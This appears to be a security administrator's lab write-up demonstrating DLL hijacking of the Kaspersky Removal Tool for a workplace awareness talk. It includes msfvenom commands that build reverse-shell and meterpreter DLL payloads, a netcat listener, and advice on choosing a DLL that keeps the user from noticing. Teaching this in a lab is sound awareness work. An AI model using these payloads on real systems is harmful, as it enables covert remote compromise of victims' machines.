Summary

This was a fun demonstration that I used during one of my Lunch and Learn for my company. As a Security Administrator, I always get asked about downloading random software from sometimes not so reputable locations. One day I decided to spin up a quick lab environment and demonstrate what happens when downloading and running questionable software. It’s always funny to see how non security folks react once we gain remote access and through the magical command line interface.

DLL Injection Overview
Below is a quick reference of the DLL search order. I’m sorry but I don’t remember where I got these from, maybe Pentest Academy/SecurityTube.

DLL Search Order

SafeDLLSearchMode is enabled:

Lab Setup Overview
The vulnerable program that we’re going to use is Kaspersky Removal Tool. This is a program that aids with the removal of the Kaspersky antivirus software.
http://support.kaspersky.com/downloads/utils/kavremover.exe

We’ll also use two virtual machines:
Windows 10 - We’ll predominantly use this for finding the missing dll and to also be our “victim” machine once we’re ready to run the questionable software.
Kali - This will be used to generate the reverse shell and to also catch it once the software is ran from the “victim” machine.

Finding the missing dll
Let’s open Procmon as administrator and use the below filters, then select ok.

We should now have a clean page.

Next, let’s run the installer to see if we can locate some missing dll files that we can potentially use to exploit.

The trick is to find a dll that doesn’t crash the program. We want the program to run as it normally does without anyone knowing any difference.

With this in mind, we can play around and see which one works better than the other, but the best that I could do was to use this one, “kavremoverENU.dll”.
It doesn’t necessarily crash the program with a Windows crash prompt, but it doesn’t fully run either. This is where playing around with the various steps within the program makes all the difference.

First, let’s create a reverse shell dll payload on the Kali machine, then transfer it back to the Windows box.

This is the reverse shell syntax

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.101.198 LPORT=443 EXITFUNC=thread -f dll -e x86/shikata_ga_nai -o kavremoverENU.dll

Later we’ll demonstrate using the below.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.101.198 LPORT=443 -f dll -o msi.dll

We’ll now copy the malicious dll to the same directory that the installer resides.

Close out the installer, then clear out Procmon to see the processes as they launch.

On the Kali machine, let’s open a netcat session on port 443.

nc -lvnp 443

Let’s now start the installer to see if we can catch a shell.

Looks like we’re in business. We now have a reverse shell!

Going back to Procmon, we can see that a rundll32.exe process was immediately launched, which is used for the reverse shell.

We can always go back in the program’s steps to find another dll to make it move along better so that we don’t tip off the end user. Another useful dll is “msi.dll”. This one presents itself after we select Accept the EULA. Using this one instead, will bring you to the next step of the program, see below.

Using the “msi.dll” will launch a reverse shell at this step. I suggest to play around to see what works better for your needs.

Conclusion

There are many ways to exploit programs, but I find dll injection to be one of the quicker methods, especially if a program is already installed.

I hope that you found this writeup informative and maybe you can also demo this during a Lunch and Learn or whenever you’re asked to present something to the company. Until next time, take care.